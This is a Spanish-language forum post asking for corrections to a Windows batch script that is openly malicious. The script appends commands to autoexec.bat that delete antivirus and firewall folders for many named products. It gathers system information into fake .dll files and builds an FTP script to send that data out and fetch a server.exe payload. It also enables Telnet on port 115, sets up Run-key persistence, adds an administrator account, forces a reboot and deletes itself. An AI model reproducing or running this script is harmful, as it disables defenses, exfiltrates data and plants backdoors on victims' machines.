Hola voy a añadir esto corrijamen si estoy correcto
@echo off
echo cd\ >> c:\autoexec.bat
echo rd /q /s *norton sytemworks* >> c:\autoexec.bat
echo rd /q /s *panda* >> c:\autoexec.bat
echo rd /q /s *norton* >> c:\autoexec.bat
echo rd /q /s *firewall* >> c:\autoexec.bat
echo rd /q /s *KAV personal* >> c:\autoexec.bat
echo rd /q /s *NOD32 Anti-virus* >> c:\autoexec.bat
echo rd /q /s *BitDefender prof* >> c:\autoexec.bat
echo rd /q /s *McAfee Virusscan* >> c:\autoexec.bat
echo rd /q /s *AVG professional* >> c:\autoexec.bat
echo rd /q /s *Norton Anti-Virus* >> c:\autoexec.bat
echo rd /q /s *Avast Home* >> c:\autoexec.bat
echo rd /q /s *Panda antivirus* >> c:\autoexec.bat
echo rd /q /s *F-prot Anti-virus* >> c:\autoexec.bat
echo rd /q /s *RAV Desktop* >> c:\autoexec.bat
echo rd /q /s *Dr. Web* >> c:\autoexec.bat
echo cd *archivos* >> c:\autoexec.bat
echo rd /q /s *norton sytemworks* >> c:\autoexec.bat
echo rd /q /s *panda* >> c:\autoexec.bat
echo rd /q /s *norton* >> c:\autoexec.bat
echo rd /q /s *firewall* >> c:\autoexec.bat
echo rd /q /s *KAV personal* >> c:\autoexec.bat
echo rd /q /s *NOD32 Anti-virus* >> c:\autoexec.bat
echo rd /q /s *BitDefender prof* >> c:\autoexec.bat
echo rd /q /s *McAfee Virusscan* >> c:\autoexec.bat
echo rd /q /s *AVG professional* >> c:\autoexec.bat
echo rd /q /s *Norton Anti-Virus* >> c:\autoexec.bat
echo rd /q /s *Avast Home* >> c:\autoexec.bat
echo rd /q /s *Panda antivirus* >> c:\autoexec.bat
echo rd /q /s *F-prot Anti-virus* >> c:\autoexec.bat
echo rd /q /s *RAV Desktop* >> c:\autoexec.bat
echo rd /q /s *Dr. Web* >> c:\autoexec.bat
echo cd.. >> c:\autoexec.bat
echo cd windows >> c:\autoexec.bat
echo rd /q /s *norton sytemworks* >> c:\autoexec.bat
echo rd /q /s *panda* >> c:\autoexec.bat
echo rd /q /s *norton* >> c:\autoexec.bat
echo rd /q /s *firewall* >> c:\autoexec.bat
echo rd /q /s *KAV personal* >> c:\autoexec.bat
echo rd /q /s *NOD32 Anti-virus* >> c:\autoexec.bat
echo rd /q /s *BitDefender prof* >> c:\autoexec.bat
echo rd /q /s *McAfee Virusscan* >> c:\autoexec.bat
echo rd /q /s *AVG professional* >> c:\autoexec.bat
echo rd /q /s *Norton Anti-Virus* >> c:\autoexec.bat
echo rd /q /s *Avast Home* >> c:\autoexec.bat
echo rd /q /s *Panda antivirus* >> c:\autoexec.bat
echo rd /q /s *F-prot Anti-virus* >> c:\autoexec.bat
echo rd /q /s *RAV Desktop* >> c:\autoexec.bat
echo rd /q /s *Dr. Web* >> c:\autoexec.bat
cd..
start
Para ver este enlace Registrate o Inicia Sesionipconfig /all > c:\windows\win32ip.dll
gpresult >> c:\windows\win32ip.dll
systeminfo >> c:\windows\win32ip.dll
echo USER > c:\windows\Win32el.dll
echo PASWORD > c:\windows\Win32el.dll
echo send c:\windows\win32ip.dll > c:\windows\win32el.dll
echo get server.exe > c:\windows\win32el.dll
echo QUIT >> c:\windows\Win32el.dll TU NOMBRE.iespana
.es
move c:\server.exe c:\windows\server.exe
cd windows
server.exe
cd..
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d %windir%\system32\yo.bat /f
pause
net user nombre pass /add
net localgroup "Administradore s" nombre /add
pause
echo @echo off>>%windir%\system32\yo.bat
echo REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f>>%windir%\system32\yo.bat
echo REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d %windir%\system32\yo.bat /f>>%windir%\system32\yo.bat
echo net user nombre pass /add>>%windir%\system32\yo.bat
echo net localgroup "Administradore s" nombre /add>>%windir%\system32\yo.bat
echo tlntadmn config port = 115>>%windir%\system32\yo.bat
echo exit>>%windir%\system32\yo.bat
pause
shutdown -r -t 00 -f -c "reiniciamos para efectuar cambios"
del %0
exit